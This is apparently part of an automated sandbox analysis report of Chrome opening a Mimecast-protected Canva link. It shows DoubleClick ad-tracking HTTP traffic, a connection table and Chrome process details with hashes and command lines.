                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                    X-Client-Data: CI+2yQEIpbbJAQipncoBCO6LywEIlaHLAQic/swBCPqYzQEIhaDNAQi5ys0BGOuNpRc=
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                    Attribution-Reporting-Eligible: event-source, trigger=navigation-source
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    2024-11-20 15:02:00 UTC2969INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:02:00 GMT
                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                    Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                    Attribution-Reporting-Register-Trigger: {"aggregatable_deduplication_keys":[{"deduplication_key":"16416647400475131194"}],"aggregatable_trigger_data":[{"filters":[{"14":["13079090"]}],"key_piece":"0x10fe9768b6dba928","source_keys":["12","13","14","15","16","17","18","19","20","21","24752168","24752169","24752170","24752171","628512992","628512993","628512994","628512995","628717332","628717333","628717334","628717335","628748640","628748641","628748642","628748643","628760464","628760465","628760466","628760467","640991956","640991957","640991958","640991959"]},{"key_piece":"0xb1cffae4d9d287ed","not_filters":{"14":["13079090"]},"source_keys":["12","13","14","15","16","17","18","19","20","21","24752168","24752169","24752170","24752171","628512992","628512993","628512994","628512995","628717332","628717333","628717334","628717335","628748640","628748641","628748642","628748643","628760464","628760465","628760466","628760467","640991956","640991957","640991958","640991959"]}],"aggregatable_values":{"12":65,"13": [TRUNCATED]
                                                                                                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    Server: cafe
                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                                    Set-Cookie: ar_debug=1; expires=Fri, 20-Dec-2024 15:02:00 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                                    Set-Cookie: test_cookie=CheckForPermission; expires=Wed, 20-Nov-2024 15:17:00 GMT; path=/; domain=.doubleclick.net; Secure; SameSite=none
                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    149192.168.2.1249884172.217.17.70443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:59 UTC1258OUTGET /activity;src=9812343;type=conve0;cat=canva008;ord=1119434276;gtm=45j91e4bi1v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102077855~102081485;ps=1;pcor=1893244437;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor? HTTP/1.1
                                                                                                                                                                                                                                                                    Host: ad.doubleclick.net
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                    X-Client-Data: CI+2yQEIpbbJAQipncoBCO6LywEIlaHLAQic/swBCPqYzQEIhaDNAQi5ys0BGOuNpRc=
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    2024-11-20 15:02:00 UTC1384INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                    P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:02:00 GMT
                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                    Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                    Location: https://adservice.google.com/ddm/fls/z/src=9812343;type=conve0;cat=canva008;ord=1119434276;gtm=45j91e4bi1v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102077855~102081485;ps=1;pcor=1893244437;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor
                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    Server: cafe
                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                                    Set-Cookie: test_cookie=CheckForPermission; expires=Wed, 20-Nov-2024 15:17:00 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                                                    Start time:10:01:12
                                                                                                                                                                                                                                                                    Start date:20/11/2024
                                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                                                                                                                    Imagebase:0x7ff776010000
                                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                                    MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                                                                                    Start time:10:01:18
                                                                                                                                                                                                                                                                    Start date:20/11/2024
                                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2512 --field-trial-handle=2480,i,5302738435482969392,3902494254150986920,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                                    Imagebase:0x7ff776010000
                                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                                    MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                                                                    Start time:10:01:20
                                                                                                                                                                                                                                                                    Start date:20/11/2024
                                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://url.us.m.mimecastprotect.com/s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.com"
                                                                                                                                                                                                                                                                    Imagebase:0x7ff776010000
                                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                                    MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                                                                    Start time:10:01:42
                                                                                                                                                                                                                                                                    Start date:20/11/2024
                                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4272 --field-trial-handle=2480,i,5302738435482969392,3902494254150986920,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                                    Imagebase:0x7ff776010000
                                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                                    MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                    No disassembly